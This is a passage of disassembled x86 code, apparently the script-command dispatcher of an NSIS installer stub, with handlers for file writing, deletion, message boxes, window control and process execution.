mov edi, 400h
push edi
push esi
call ds:dword_40809C ; GetFullPathNameA
test eax, eax
jz short loc_4019D3
mov eax, [ebp+arg_0]
cmp eax, esi
jbe short loc_4019DD
cmp byte ptr [eax], 0
jz short loc_4019DD
push esi
call sub_406168
test eax, eax
jz short loc_4019D3
add eax, 2Ch
push eax
push [ebp+arg_0]
call sub_405FFD ; lstrcpy
jmp short loc_4019DD
; ---------------------------------------------------------------------------
loc_4019D3: ; CODE XREF: sub_401610+39D�j
; sub_401610+3B3�j
mov [ebp+var_4], 1
mov byte ptr [ebx], 0
loc_4019DD: ; CODE XREF: sub_401610+3A4�j
; sub_401610+3A9�j ...
cmp [ebp+var_30], 0
jnz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
push edi
push ebx
push ebx
call ds:dword_408098 ; GetShortPathNameA
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_4019F5: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
or esi, 0FFFFFFFFh ; jumptable 0040166B case 16
call sub_401508
lea ecx, [ebp+arg_0]
push ecx
push edi
push 400h
push 0
push eax
push 0
call ds:dword_408094 ; SearchPathA
test eax, eax
loc_401A14: ; CODE XREF: sub_401610+12F8�j
jnz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
loc_401A1A: ; CODE XREF: sub_401610+172A�j
; sub_401610+1746�j
mov [ebp+var_4], 1
mov byte ptr [edi], 0
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_401A29: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 0FFFFFFEFh ; jumptable 0040166B case 17
pop esi
call sub_401508
push eax
push edi
call sub_405EA9
loc_401A38: ; CODE XREF: sub_401610+12B5�j
; sub_401610+1615�j
test eax, eax
loc_401A3A: ; CODE XREF: sub_401610+16D4�j
jnz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
loc_401A40: ; CODE XREF: sub_401610+75A�j
; sub_401610+9ED�j ...
mov [ebp+var_4], 1
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_401A4C: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
and esi, 7 ; jumptable 0040166B case 18
test byte ptr dword_426444+1, 4
mov [ebp+arg_0], esi
jnz short loc_401A73
push 31h
pop esi
call sub_401508
mov ebx, eax
push ebx
mov [ebp+var_10], ebx
call sub_406003 ; lstrlen
jmp loc_401B10
; ---------------------------------------------------------------------------
loc_401A73: ; CODE XREF: sub_401610+449�j
push 36h
pop esi
call sub_401508
mov ebx, eax
push ebx
mov [ebp+var_10], ebx
call sub_406003 ; lstrlen
push dword_4201B0
mov esi, eax
call sub_406003 ; lstrlen
lea ecx, [eax+esi+1]
mov eax, 105h
cmp ecx, eax
jb short loc_401AAF
push dword_4201B0
call sub_406003 ; lstrlen
lea eax, [eax+esi+1]
loc_401AAF: ; CODE XREF: sub_401610+48E�j
push eax
call sub_405DBB
mov edi, eax
test edi, edi
mov [ebp+var_C], edi
jz loc_402E4D
push dword_4201B0
push edi
call sub_405FFD ; lstrcpy
push ebx
push edi
call ds:dword_4080A4 ; lstrcat
push edi
call sub_406003 ; lstrlen
lea esi, [eax+edi-1]
jmp short loc_401AF1
; ---------------------------------------------------------------------------
loc_401AE2: ; CODE XREF: sub_401610+4E3�j
cmp byte ptr [esi], 5Ch
jz short loc_401AF5
push esi
push edi
call ds:dword_40822C ; CharPrevA
mov esi, eax
loc_401AF1: ; CODE XREF: sub_401610+4D0�j
cmp esi, edi
ja short loc_401AE2
loc_401AF5: ; CODE XREF: sub_401610+4D5�j
push edi
mov byte ptr [esi], 0
call sub_406301
test eax, eax
jz loc_402E4D
push edi
push ebx
mov byte ptr [esi], 5Ch
call sub_405FFD ; lstrcpy
loc_401B10: ; CODE XREF: sub_401610+45E�j
mov eax, [ebp+var_38]
sar eax, 3
push ebx
and eax, 2
push eax
push [ebp+arg_0]
push offset aFileOverwritef ; "File: overwriteflag=%d, allowskipfilesf"...
call sub_40614C
add esp, 10h
push ebx
call sub_405DE6
test eax, eax
mov esi, offset dword_40A488
push ebx
jz short loc_401B43
push esi
call sub_405FFD ; lstrcpy
jmp short loc_401B5B
; ---------------------------------------------------------------------------
loc_401B43: ; CODE XREF: sub_401610+529�j
push offset dword_42C800
push esi
call sub_405FFD ; lstrcpy
push eax
call sub_4061A6
push eax
call ds:dword_4080A4 ; lstrcat
loc_401B5B: ; CODE XREF: sub_401610+531�j
push esi
call sub_406009
mov ebx, offset byte_40A888
mov edi, offset dword_40AC88
loc_401B6B: ; CODE XREF: sub_401610+626�j
cmp [ebp+arg_0], 3
jl short loc_401BA2
push esi
call sub_406168
xor ecx, ecx
test eax, eax
jz short loc_401B8D
lea ecx, [ebp+var_2C]
push ecx
add eax, 14h
push eax
call ds:dword_408090 ; CompareFileTime
mov ecx, eax
loc_401B8D: ; CODE XREF: sub_401610+56B�j
mov eax, [ebp+arg_0]
add eax, 0FFFFFFFDh
or eax, 80000000h
and eax, ecx
neg eax
sbb eax, eax
inc eax
mov [ebp+arg_0], eax
loc_401BA2: ; CODE XREF: sub_401610+55F�j
cmp [ebp+arg_0], 0
jnz short loc_401BBA
push esi
call ds:dword_40808C ; GetFileAttributesA
and eax, 0FFFFFFFEh
push eax
push esi
call ds:dword_4080AC ; SetFileAttributesA
loc_401BBA: ; CODE XREF: sub_401610+596�j
xor eax, eax
cmp [ebp+arg_0], 1
setnz al
inc eax
push eax
push 40000000h
push esi
call sub_405E7A
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz loc_401C93
cmp [ebp+arg_0], 0
jnz short loc_401C51
push esi
push offset aFileErrorCreat ; "File: error creating \"%s\""
call sub_40614C
pop ecx
pop ecx
push offset dword_427000
push edi
call sub_405FFD ; lstrcpy
push esi
push offset dword_427000
call sub_405FFD ; lstrcpy
push [ebp+var_24]
push ebx
call sub_4065B7
push edi
push offset dword_427000
call sub_405FFD ; lstrcpy
mov eax, [ebp+var_38]
sar eax, 3
push eax
push ebx
call sub_405D79
sub eax, 4
jnz short loc_401C3B
push offset aFileErrorUserR ; "File: error, user retry"
call sub_40614C
pop ecx
jmp loc_401B6B
; ---------------------------------------------------------------------------
loc_401C3B: ; CODE XREF: sub_401610+619�j
dec eax
jz short loc_401C7D
push offset aFileErrorUserA ; "File: error, user abort"
call sub_40614C
pop ecx
push esi
push 0FFFFFFFAh
jmp loc_40169F
; ---------------------------------------------------------------------------
loc_401C51: ; CODE XREF: sub_401610+5D0�j
push [ebp+var_10]
push 0FFFFFFE2h
call sub_40509F
cmp [ebp+arg_0], 2
jnz short loc_401C67
inc dword_426468
loc_401C67: ; CODE XREF: sub_401610+64F�j
push [ebp+arg_0]
push esi
push offset aFileSkippedSOv ; "File: skipped: \"%s\" (overwriteflag=%d)"
call sub_40614C
add esp, 0Ch
jmp loc_4031C3
; ---------------------------------------------------------------------------
loc_401C7D: ; CODE XREF: sub_401610+62C�j
push offset aFileErrorUserC ; "File: error, user cancel"
call sub_40614C
inc dword_426468
pop ecx
jmp loc_4031DB
; ---------------------------------------------------------------------------
loc_401C93: ; CODE XREF: sub_401610+5C6�j
push [ebp+var_10]
push 0FFFFFFEAh
call sub_40509F
inc dword_40A040
xor ebx, ebx
push ebx
push ebx
push [ebp+var_8]
push [ebp+var_30]
call sub_40362B
dec dword_40A040
mov edi, eax
push esi
push edi
push offset aFileWroteDToS ; "File: wrote %d to \"%s\""
call sub_40614C
add esp, 0Ch
cmp [ebp+var_2C], 0FFFFFFFFh
jnz short loc_401CD5
cmp [ebp+var_28], 0FFFFFFFFh
jz short loc_401CE4
loc_401CD5: ; CODE XREF: sub_401610+6BD�j
lea eax, [ebp+var_2C]
push eax
push ebx
push eax
push [ebp+var_8]
call ds:dword_408088 ; SetFileTime
loc_401CE4: ; CODE XREF: sub_401610+6C3�j
push [ebp+var_8]
call ds:dword_408084 ; CloseHandle
cmp edi, ebx
jge loc_4031C3
cmp edi, 0FFFFFFFEh
jnz short loc_401D0E
push 0FFFFFFE9h
push esi
call sub_4065B7
push [ebp+var_10]
push esi
call ds:dword_4080A4 ; lstrcat
jmp short loc_401D16
; ---------------------------------------------------------------------------
loc_401D0E: ; CODE XREF: sub_401610+6E8�j
push 0FFFFFFEEh
push esi
call sub_4065B7
loc_401D16: ; CODE XREF: sub_401610+6FC�j
push esi
push offset aS ; "%s"
call sub_40614C
pop ecx
pop ecx
push 200010h
push esi
loc_401D29: ; CODE XREF: sub_401610+1220�j
call sub_405D79
jmp loc_402E4D
; ---------------------------------------------------------------------------
loc_401D33: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor esi, esi ; jumptable 0040166B case 19
call sub_401508
mov esi, eax
push esi
push offset aDeleteS ; "Delete: \"%s\""
jmp short loc_401D9A
; ---------------------------------------------------------------------------
loc_401D44: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 31h ; jumptable 0040166B case 20
pop esi
call sub_401508
mov esi, eax
push esi
push [ebp+var_38]
push offset aMessageboxDS ; "MessageBox: %d,\"%s\""
call sub_40614C
add esp, 0Ch
push [ebp+var_38]
push esi
call sub_405D79
test eax, eax
jz loc_401A40
cmp eax, [ebp+var_30]
jz loc_401ECB
cmp eax, [ebp+var_28]
jnz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
mov eax, [ebp+var_24]
jmp loc_4031DD
; ---------------------------------------------------------------------------
loc_401D8A: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 0FFFFFFF0h ; jumptable 0040166B case 21
pop esi
call sub_401508
mov esi, eax
push esi
push offset aRmdirS ; "RMDir: \"%s\""
loc_401D9A: ; CODE XREF: sub_401610+732�j
call sub_40614C
pop ecx
pop ecx
push [ebp+var_34]
push esi
call sub_4067E6
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_401DAF: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor esi, esi ; jumptable 0040166B case 22
inc esi
call sub_401508
push eax
call sub_406003 ; lstrlen
loc_401DBD: ; CODE XREF: sub_401610+B34�j
; sub_401610+C2A�j ...
push eax
jmp loc_4017CD
; ---------------------------------------------------------------------------
loc_401DC3: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 2 ; jumptable 0040166B case 23
pop ecx
call sub_4014F2
push 3
pop ecx
mov [ebp+arg_0], eax
call sub_4014F2
xor esi, esi
inc esi
mov ebx, eax
call sub_401508
cmp [ebp+var_30], 0
mov esi, eax
mov byte ptr [edi], 0
jz short loc_401DF5
cmp [ebp+arg_0], 0
jz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
loc_401DF5: ; CODE XREF: sub_401610+7D9�j
push esi
call sub_406003 ; lstrlen
test ebx, ebx
jge short loc_401E07
add ebx, eax
js loc_4031D2 ; default
; jumptable 0040166B cases 64,65
loc_401E07: ; CODE XREF: sub_401610+7ED�j
cmp ebx, eax
jle short loc_401E0D
mov ebx, eax
loc_401E0D: ; CODE XREF: sub_401610+7F9�j
add esi, ebx
push esi
push edi
call sub_405FFD ; lstrcpy
mov esi, [ebp+arg_0]
test esi, esi
jz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
jge short loc_401E34
push edi
call sub_406003 ; lstrlen
add esi, eax
jns short loc_401E34
and [ebp+arg_0], 0
mov esi, [ebp+arg_0]
loc_401E34: ; CODE XREF: sub_401610+811�j
; sub_401610+81B�j
cmp esi, 400h
jge loc_4031D2 ; default
; jumptable 0040166B cases 64,65
mov byte ptr [esi+edi], 0
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_401E49: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 20h ; jumptable 0040166B case 24
pop esi
call sub_401508
push 31h
pop esi
mov edi, eax
call sub_401508
push eax
push edi
call ds:dword_408080 ; lstrcmpi
test eax, eax
jnz short loc_401ECB
jmp loc_4018D8
; ---------------------------------------------------------------------------
loc_401E6C: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor esi, esi ; jumptable 0040166B case 25
inc esi
call sub_401508
cmp [ebp+var_30], 0
push 400h
push edi
push eax
jz short loc_401E92
call ds:dword_40807C ; GetEnvironmentVariableA
test eax, eax
jnz short loc_401E98
mov [ebp+var_4], esi
mov [edi], al
jmp short loc_401E98
; ---------------------------------------------------------------------------
loc_401E92: ; CODE XREF: sub_401610+86F�j
call ds:dword_408078 ; ExpandEnvironmentStringsA
loc_401E98: ; CODE XREF: sub_401610+879�j
; sub_401610+880�j
mov byte ptr [edi+3FFh], 0
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_401EA4: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor ecx, ecx ; jumptable 0040166B case 26
call sub_4014F2
xor ecx, ecx
inc ecx
mov esi, eax
call sub_4014F2
cmp [ebp+var_24], 0
jnz short loc_401EC7
cmp esi, eax
jl short loc_401ECB
jle loc_4018D8
jmp short loc_401ED9
; ---------------------------------------------------------------------------
loc_401EC7: ; CODE XREF: sub_401610+8A9�j
cmp esi, eax
jnb short loc_401ED3
loc_401ECB: ; CODE XREF: sub_401610+763�j
; sub_401610+855�j ...
mov eax, [ebp+var_2C]
jmp loc_4031DD
; ---------------------------------------------------------------------------
loc_401ED3: ; CODE XREF: sub_401610+8B9�j
jbe loc_4018D8
loc_401ED9: ; CODE XREF: sub_401610+8B5�j
mov eax, [ebp+var_28]
jmp loc_4031DD
; ---------------------------------------------------------------------------
loc_401EE1: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor ebx, ebx ; jumptable 0040166B case 27
inc ebx
mov ecx, ebx
call sub_4014F2
push 2
pop ecx
mov esi, eax
call sub_4014F2
mov ecx, eax
mov eax, [ebp+var_2C]
cmp eax, 0Ch ; switch 13 cases
ja short loc_401F67 ; default
jmp ds:off_4032F0[eax*4] ; switch jump
loc_401F06: ; DATA XREF: .text:off_4032F0�o
add esi, ecx ; jumptable 00401EFF case 0
jmp short loc_401F67 ; default
; ---------------------------------------------------------------------------
loc_401F0A: ; CODE XREF: sub_401610+8EF�j
; DATA XREF: .text:off_4032F0�o
sub esi, ecx ; jumptable 00401EFF case 1
jmp short loc_401F67 ; default
; ---------------------------------------------------------------------------
loc_401F0E: ; CODE XREF: sub_401610+8EF�j
; DATA XREF: .text:off_4032F0�o
imul ecx, esi ; jumptable 00401EFF case 2
mov esi, ecx
jmp short loc_401F67 ; default
; ---------------------------------------------------------------------------
loc_401F15: ; CODE XREF: sub_401610+8EF�j
; DATA XREF: .text:off_4032F0�o
test ecx, ecx ; jumptable 00401EFF case 3
jz short loc_401F5A
mov eax, esi
cdq
idiv ecx
loc_401F1E: ; CODE XREF: sub_401610+925�j
mov esi, eax
jmp short loc_401F67 ; default
; ---------------------------------------------------------------------------
loc_401F22: ; CODE XREF: sub_401610+8EF�j
; DATA XREF: .text:off_4032F0�o
or esi, ecx ; jumptable 00401EFF case 4
jmp short loc_401F67 ; default
; ---------------------------------------------------------------------------
loc_401F26: ; CODE XREF: sub_401610+8EF�j
; DATA XREF: .text:off_4032F0�o
and esi, ecx ; jumptable 00401EFF case 5
jmp short loc_401F67 ; default
; ---------------------------------------------------------------------------
loc_401F2A: ; CODE XREF: sub_401610+8EF�j
; DATA XREF: .text:off_4032F0�o
xor esi, ecx ; jumptable 00401EFF case 6
jmp short loc_401F67 ; default
; ---------------------------------------------------------------------------
loc_401F2E: ; CODE XREF: sub_401610+8EF�j
; DATA XREF: .text:off_4032F0�o
xor eax, eax ; jumptable 00401EFF case 7
test esi, esi
setz al
jmp short loc_401F1E
; ---------------------------------------------------------------------------
loc_401F37: ; CODE XREF: sub_401610+8EF�j
; DATA XREF: .text:off_4032F0�o
test esi, esi ; jumptable 00401EFF case 8
jnz short loc_401F49
jmp short loc_401F45
; ---------------------------------------------------------------------------
loc_401F3D: ; CODE XREF: sub_401610+933�j
; sub_401610+937�j
xor esi, esi
jmp short loc_401F67 ; default
; ---------------------------------------------------------------------------
loc_401F41: ; CODE XREF: sub_401610+8EF�j
; DATA XREF: .text:off_4032F0�o
test esi, esi ; jumptable 00401EFF case 9
jz short loc_401F3D
loc_401F45: ; CODE XREF: sub_401610+92B�j
test ecx, ecx
jz short loc_401F3D
loc_401F49: ; CODE XREF: sub_401610+929�j
mov esi, ebx
jmp short loc_401F67 ; default
; ---------------------------------------------------------------------------
loc_401F4D: ; CODE XREF: sub_401610+8EF�j
; DATA XREF: .text:off_4032F0�o
test ecx, ecx ; jumptable 00401EFF case 10
jz short loc_401F5A
mov eax, esi
cdq
idiv ecx
mov esi, edx
jmp short loc_401F67 ; default
; ---------------------------------------------------------------------------
loc_401F5A: ; CODE XREF: sub_401610+907�j
; sub_401610+93F�j
xor esi, esi
mov [ebp+var_4], ebx
jmp short loc_401F67 ; default
; ---------------------------------------------------------------------------
loc_401F61: ; CODE XREF: sub_401610+8EF�j
; DATA XREF: .text:off_4032F0�o
shl esi, cl ; jumptable 00401EFF case 11
jmp short loc_401F67 ; default
; ---------------------------------------------------------------------------
loc_401F65: ; CODE XREF: sub_401610+8EF�j
; DATA XREF: .text:off_4032F0�o
sar esi, cl ; jumptable 00401EFF case 12
loc_401F67: ; CODE XREF: sub_401610+8ED�j
; sub_401610+8F8�j ...
push esi ; default
jmp loc_4017CD
; ---------------------------------------------------------------------------
loc_401F6D: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor esi, esi ; jumptable 0040166B case 28
inc esi
call sub_401508
push 2
pop ecx
mov esi, eax
call sub_4014F2
push eax
push esi
push edi
call ds:dword_408230 ; wsprintfA
jmp loc_402ABF
; ---------------------------------------------------------------------------
loc_401F8D: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
mov eax, [ebp+var_30] ; jumptable 0040166B case 29
test eax, eax
mov esi, dword_40A480
jz short loc_401FEA
loc_401F9A: ; CODE XREF: sub_401610+993�j
dec eax
test esi, esi
jz short loc_401FA9
test eax, eax
mov esi, [esi]
jnz short loc_401F9A
test esi, esi
jnz short loc_401FBD
loc_401FA9: ; CODE XREF: sub_401610+98D�j
push [ebp+var_30]
push offset aExchStackDElem ; "Exch: stack < %d elements"
call sub_40614C
pop ecx
pop ecx
jmp loc_402821
; ---------------------------------------------------------------------------
loc_401FBD: ; CODE XREF: sub_401610+997�j
lea edi, [esi+4]
push edi
mov esi, offset dword_40A488
push esi
call sub_405FFD ; lstrcpy
mov eax, dword_40A480
add eax, 4
push eax
push edi
call sub_405FFD ; lstrcpy
mov eax, dword_40A480
push esi
add eax, 4
push eax
jmp loc_4030E5
; ---------------------------------------------------------------------------
loc_401FEA: ; CODE XREF: sub_401610+988�j
test edx, edx
jz short loc_402019
test esi, esi
jnz short loc_402002
push offset aPopStackEmpty ; "Pop: stack empty"
call sub_40614C
pop ecx
jmp loc_401A40
; ---------------------------------------------------------------------------
loc_402002: ; CODE XREF: sub_401610+9E0�j
lea eax, [esi+4]
push eax
push edi
call sub_405FFD ; lstrcpy
mov eax, [esi]
mov dword_40A480, eax
push esi
jmp loc_4031CC
; ---------------------------------------------------------------------------
loc_402019: ; CODE XREF: sub_401610+9DC�j
push 404h
call sub_405DBB
push [ebp+var_38]
mov esi, eax
lea eax, [esi+4]
push eax
call sub_4065B7
mov eax, dword_40A480
mov [esi], eax
mov dword_40A480, esi
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_402043: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 33h ; jumptable 0040166B cases 30,31
pop esi
call sub_401508
push 44h
pop esi
mov [ebp+var_C], eax
call sub_401508
xor esi, esi
inc esi
test byte ptr [ebp+var_24], 1
mov [ebp+arg_0], eax
jnz short loc_40206D
push [ebp+var_C]
call sub_405F74
mov [ebp+var_C], eax
loc_40206D: ; CODE XREF: sub_401610+A50�j
test byte ptr [ebp+var_24], 2
jnz short loc_40207E
push [ebp+arg_0]
call sub_405F74
mov [ebp+arg_0], eax
loc_40207E: ; CODE XREF: sub_401610+A61�j
cmp [ebp+var_3C], 21h
jnz short loc_4020CC
mov ecx, esi
call sub_4014F2
push 2
pop ecx
mov esi, eax
call sub_4014F2
mov ecx, [ebp+var_24]
sar ecx, 2
jz short loc_4020BC
lea edx, [ebp+var_8]
push edx
push ecx
push 0
push [ebp+arg_0]
push [ebp+var_C]
push eax
push esi
call ds:dword_408234 ; SendMessageTimeoutA
neg eax
sbb eax, eax
inc eax
mov [ebp+var_4], eax
jmp short loc_4020FC
; ---------------------------------------------------------------------------
loc_4020BC: ; CODE XREF: sub_401610+A8B�j
push [ebp+arg_0]
push [ebp+var_C]
push eax
push esi
call ds:dword_408278 ; SendMessageA
jmp short loc_4020F9
; ---------------------------------------------------------------------------
loc_4020CC: ; CODE XREF: sub_401610+A72�j
call sub_401508
push 12h
pop esi
mov ebx, eax
call sub_401508
mov cl, [eax]
neg cl
sbb ecx, ecx
and ecx, eax
mov al, [ebx]
neg al
push ecx
sbb eax, eax
and eax, ebx
push eax
push [ebp+arg_0]
push [ebp+var_C]
call ds:dword_408238 ; FindWindowExA
loc_4020F9: ; CODE XREF: sub_401610+ABA�j
mov [ebp+var_8], eax
loc_4020FC: ; CODE XREF: sub_401610+AAA�j
cmp [ebp+var_38], 0
jl loc_4031D2 ; default
; jumptable 0040166B cases 64,65
push [ebp+var_8]
jmp loc_4017CD
; ---------------------------------------------------------------------------
loc_40210E: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor ecx, ecx ; jumptable 0040166B case 32
call sub_4014F2
push eax
call ds:dword_40823C ; IsWindow
test eax, eax
jz loc_4018D8
loc_402124: ; CODE XREF: sub_401610+2B2�j
mov eax, [ebp+var_34]
jmp loc_4031DD
; ---------------------------------------------------------------------------
loc_40212C: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 2 ; jumptable 0040166B case 33
pop ecx
call sub_4014F2
xor ecx, ecx
push eax
inc ecx
call sub_4014F2
push eax
call ds:dword_408240 ; GetDlgItem
jmp loc_401DBD
; ---------------------------------------------------------------------------
loc_402149: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
mov eax, dword_426428 ; jumptable 0040166B case 34
add eax, edx
push eax
push 0FFFFFFEBh
xor ecx, ecx
call sub_4014F2
push eax
call ds:dword_408244 ; SetWindowLongA
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_402166: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push edx ; jumptable 0040166B case 35
push [ebp+var_10]
call ds:dword_408240 ; GetDlgItem
mov edi, eax
lea eax, [ebp+var_54]
push eax
push edi
call ds:dword_408268 ; GetClientRect
mov eax, [ebp+var_48]
imul eax, [ebp+var_30]
push 10h
push eax
mov eax, [ebp+var_4C]
imul eax, [ebp+var_30]
push eax
xor ebx, ebx
push ebx
xor esi, esi
call sub_401508
push eax
push ebx
call ds:dword_408248 ; LoadImageA
push eax
push ebx
push 172h
push edi
call ds:dword_408278 ; SendMessageA
cmp eax, ebx
jz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
push eax
call ds:dword_408040 ; DeleteObject
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_4021C3: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 48h ; jumptable 0040166B case 36
push 5Ah
push [ebp+var_10]
call ds:dword_40824C ; GetDC
push eax
call ds:dword_40803C ; GetDeviceCaps
push eax
push 2
pop ecx
call sub_4014F2
push eax
call ds:dword_408124 ; MulDiv
push 3
neg eax
pop ecx
mov dword_40C088, eax
call sub_4014F2
push [ebp+var_34]
mov dword_40C098, eax
mov al, byte ptr [ebp+var_28]
mov cl, al
and cl, 1
mov byte_40C09C, cl
mov cl, al
and cl, 2
and al, 4
push offset dword_40C0A4
mov byte_40C09D, cl
mov byte_40C09E, al
mov byte_40C09F, 1
call sub_4065B7
push offset dword_40C088
call ds:dword_408048 ; CreateFontIndirectA
jmp loc_401DBD
; ---------------------------------------------------------------------------
loc_40223F: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor ecx, ecx ; jumptable 0040166B case 37
call sub_4014F2
xor ecx, ecx
inc ecx
mov esi, eax
call sub_4014F2
cmp [ebp+var_30], 0
mov edi, eax
jz short loc_402263
push offset aHidewindow ; "HideWindow"
call sub_40614C
pop ecx
loc_402263: ; CODE XREF: sub_401610+C46�j
cmp [ebp+var_2C], 0
push edi
push esi
jnz short loc_402276
call ds:dword_408228 ; ShowWindow
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_402276: ; CODE XREF: sub_401610+C59�j
call ds:dword_408250 ; EnableWindow
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_402281: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor esi, esi ; jumptable 0040166B case 38
call sub_401508
push 31h
pop esi
mov edi, eax
call sub_401508
push 22h
pop esi
mov ebx, eax
call sub_401508
push ebx
push edi
push offset aSS ; "%s %s"
push offset byte_40A888
mov esi, eax
call ds:dword_408230 ; wsprintfA
add esp, 10h
push 0FFFFFFECh
call sub_4014E1
mov al, [esi]
push [ebp+var_2C]
neg al
push offset dword_42C800
sbb eax, eax
and eax, esi
push eax
mov al, [edi]
neg al
push ebx
sbb eax, eax
and eax, edi
push eax
push [ebp+var_10]
call ds:dword_408164
cmp eax, 21h
jge short loc_4022F9
push eax
push esi
push ebx
push edi
push offset aExecshellWarni ; "ExecShell: warning: error (\"%s\": file:\""...
call sub_40614C
add esp, 14h
jmp loc_401A40
; ---------------------------------------------------------------------------
loc_4022F9: ; CODE XREF: sub_401610+CD1�j
push esi
push ebx
push edi
push offset aExecshellSucce ; "ExecShell: success (\"%s\": file:\"%s\" par"...
call sub_40614C
add esp, 10h
jmp loc_4031D2 ; default
; jumptable 0040166B cases 64,65
; ---------------------------------------------------------------------------
loc_40230E: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
xor esi, esi ; jumptable 0040166B case 39
call sub_401508
mov esi, eax
push esi
push offset aExecCommandS ; "Exec: command=\"%s\""
call sub_40614C
pop ecx
pop ecx
push esi
push 0FFFFFFEBh
call sub_40509F
push offset dword_42C800
push esi
call sub_405D01
test eax, eax
mov [ebp+arg_0], eax
push esi
jz loc_4023CF
push offset aExecSuccessS ; "Exec: success (\"%s\")"
call sub_40614C
cmp [ebp+var_30], 0
pop ecx
pop ecx
jz short loc_4023C7
push 64h
push [ebp+arg_0]
call ds:dword_408074 ; WaitForSingleObject
mov esi, 102h
cmp eax, esi
jnz short loc_40239C
mov edi, ds:dword_408254
jmp short loc_40237B
; ---------------------------------------------------------------------------
loc_402371: ; CODE XREF: sub_401610+D7B�j
lea eax, [ebp+var_60]
push eax
call ds:dword_408258 ; DispatchMessageA
loc_40237B: ; CODE XREF: sub_401610+D5F�j
; sub_401610+D8A�j
push 1
push 0Fh
push 0Fh
lea eax, [ebp+var_60]
push 0
push eax
call edi ; PeekMessageA
test eax, eax
jnz short loc_402371
push 64h
push [ebp+arg_0]
call ds:dword_408074 ; WaitForSingleObject
cmp eax, esi
jz short loc_40237B
loc_40239C: ; CODE XREF: sub_401610+D57�j
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call ds:dword_408070 ; GetExitCodeProcess
cmp [ebp+var_34], 0
jl short loc_4023BA
push [ebp+var_18]
push ebx
call sub_405F5B
jmp short loc_4023C7
; ---------------------------------------------------------------------------
loc_4023BA: ; CODE XREF: sub_401610+D9D�j
cmp [ebp+var_18], 0
jz short loc_4023C7
mov [ebp+var_4], 1
loc_4023C7: ; CODE XREF: sub_401610+D43�j
; sub_401610+DA8�j ...
push [ebp+arg_0]
jmp loc_402BAD
; ---------------------------------------------------------------------------
loc_4023CF: ; CODE XREF: sub_401610+D2D�j
mov [ebp+var_4], 1
push offset aExecFailedCrea ; "Exec: failed createprocess (\"%s\")"
jmp loc_4030A5
; ---------------------------------------------------------------------------
loc_4023E0: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 2 ; jumptable 0040166B case 40
pop esi
call sub_401508
push eax
call sub_406168
mov esi, eax
test esi, esi
jz short loc_402405
push dword ptr [esi+14h]
push ebx
call sub_405F5B
push dword ptr [esi+18h]
jmp loc_4017CD
; ---------------------------------------------------------------------------
loc_402405: ; CODE XREF: sub_401610+DE2�j
mov byte ptr [edi], 0
mov byte ptr [ebx], 0
jmp loc_401A40
; ---------------------------------------------------------------------------
loc_402410: ; CODE XREF: sub_401610+5B�j
; DATA XREF: .text:off_4031E4�o
push 0FFFFFFEEh ; jumptable 0040166B case 41
lea eax, [ebp+var_54]
pop esi
mov [ebp+arg_0], eax
call sub_401508
lea ecx, [ebp+var_40]
push ecx
push eax
mov [ebp+var_14], eax
call sub_407484
mov esi, eax
test esi, esi
mov byte ptr [edi], 0
mov byte ptr [ebx], 0
mov [ebp+var_4], 1
jz loc_4031D2 ; default
; jumptable 0040166B cases 64,65
push esi
call sub_405DBB
test eax, eax
mov [ebp+var_18], eax
